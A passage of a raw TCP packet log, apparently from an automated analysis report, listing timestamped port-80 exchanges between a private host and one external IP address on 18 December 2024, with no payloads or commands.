                                                                              Dec 18, 2024 21:00:30.039865971 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.039885044 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.039947033 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.041717052 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.041731119 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.041799068 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.043600082 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.043612957 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.043667078 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.045217991 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.045229912 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.045242071 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.045330048 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.045330048 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.047008991 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.047020912 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.047091007 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.048851967 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.048862934 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.048974037 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.050563097 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.050580978 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.050678968 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.052470922 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.052483082 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.052618027 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.054121017 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.054133892 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.054152012 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.054195881 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.055942059 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.055955887 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.056037903 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.057833910 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.057847977 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.057893991 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.059520960 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.059535027 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.059642076 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.061290026 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.061311007 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.061321974 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.061335087 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.061377048 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.063060045 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.063074112 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.063806057 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.064843893 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.064857960 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.065319061 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.066762924 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.066776991 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.066874981 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.068423986 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.068438053 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.068531036 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.070178032 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.073724985 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.073745012 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.073862076 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.075437069 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.075488091 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.179444075 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.179464102 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.181348085 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.181385040 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.181404114 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.181478024 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.183176041 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.183188915 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.183228970 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.183240891 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.183275938 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.183275938 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.185034037 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.185046911 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.185129881 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.186614037 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.186625957 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.186676025 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.188147068 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.188159943 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.188251972 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.190929890 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.191534996 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.191848040 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.192394972 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.192408085 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.192440033 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.195384026 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.195399046 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.195446968 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.195837975 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.195852041 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.197230101 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.197271109 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.197293043 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.197376013 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.199390888 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.199412107 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.199805021 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.200476885 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.200494051 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.200566053 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.201961040 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.201975107 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.202081919 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.203857899 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.203872919 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.204062939 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.206295967 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.206635952 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.206650972 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.206712008 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.207354069 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.207369089 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.207801104 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.209141016 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.209157944 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.209167004 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.209223986 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.210917950 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.210932970 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.211049080 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.212800980 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.212816000 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.212876081 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.215415001 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.215430021 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.215482950 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.216268063 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.216289043 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.216299057 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.216360092 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.216360092 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:30.218276024 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.218291044 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:30.218302011 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.725446939 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.725526094 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.728347063 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.728693008 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.728754997 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.731558084 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.731611967 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.731970072 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.734863997 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.735268116 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.736244917 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.738171101 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.738609076 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.738692999 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.741457939 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.741924047 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.743870020 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.744757891 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.745136023 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.746357918 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.748121023 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.748491049 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.751360893 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.751440048 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.751759052 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.754683018 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.755093098 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.755863905 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.757998943 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.758445024 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.759859085 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.761282921 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.761691093 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.762927055 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.764576912 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.765002012 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.767863989 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.767939091 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.768362999 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.771147013 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.771267891 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.771586895 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.774554014 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.774900913 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.775861025 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.895287037 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.895342112 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.895534039 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.896410942 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.896527052 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.897192001 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.899018049 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.899171114 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.899451017 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.901542902 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.901653051 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.901922941 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.904114008 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.904172897 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.904500961 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.906588078 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.906641006 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.907012939 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.909218073 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.909653902 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.909698963 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.911602020 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.911812067 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.912033081 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.914099932 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.914170980 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.914537907 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.917062044 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.917104006 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.917326927 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.919127941 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.919503927 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.919523001 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.921624899 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.921669960 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.922049046 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.924166918 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.924216986 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.924539089 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.926667929 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.926842928 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.927016020 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.929153919 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.929210901 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.929603100 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.931849957 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.931943893 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.932599068 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.934880972 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.934932947 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.935267925 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.937438965 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.937607050 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.937773943 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.939707994 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.939831018 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.939999104 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.941953897 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.942004919 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.942261934 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.944132090 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.944196939 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.944546938 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.946641922 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.946691036 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.947055101 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.949148893 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.949203968 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.949542999 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.951639891 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.951684952 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.952086926 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.954204082 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.954262018 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.954622030 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.956720114 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.956798077 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.957159042 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.959153891 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.959223986 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.959541082 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.961733103 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.961785078 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.962095976 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.964238882 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.964304924 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.964597940 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.966667891 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.966723919 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.967053890 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.969218969 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.969279051 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.969706059 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.971770048 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.971818924 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.972120047 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.974205017 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.974402905 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.974558115 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.976696014 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.976751089 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.977085114 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.979201078 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.979262114 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.979592085 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.981699944 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.981760025 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.982100964 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.984208107 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.984491110 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.984627962 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.986720085 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.986915112 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.987077951 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.989200115 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.989260912 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.989649057 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.991784096 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.991835117 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.992192984 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.994270086 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.994328976 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.994678974 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.996769905 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.996839046 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.997185946 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.999224901 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.999265909 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.999643087 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.001808882 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.001857042 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.002176046 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.004353046 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.004707098 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.004759073 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.006753922 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.006802082 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.007198095 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.009294987 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.009342909 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.009758949 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.011785030 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.011867046 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.012243986 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.014297009 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.014689922 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.014759064 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.335272074 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.335331917 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.336831093 CET8049753139.99.188.124192.168.2.4
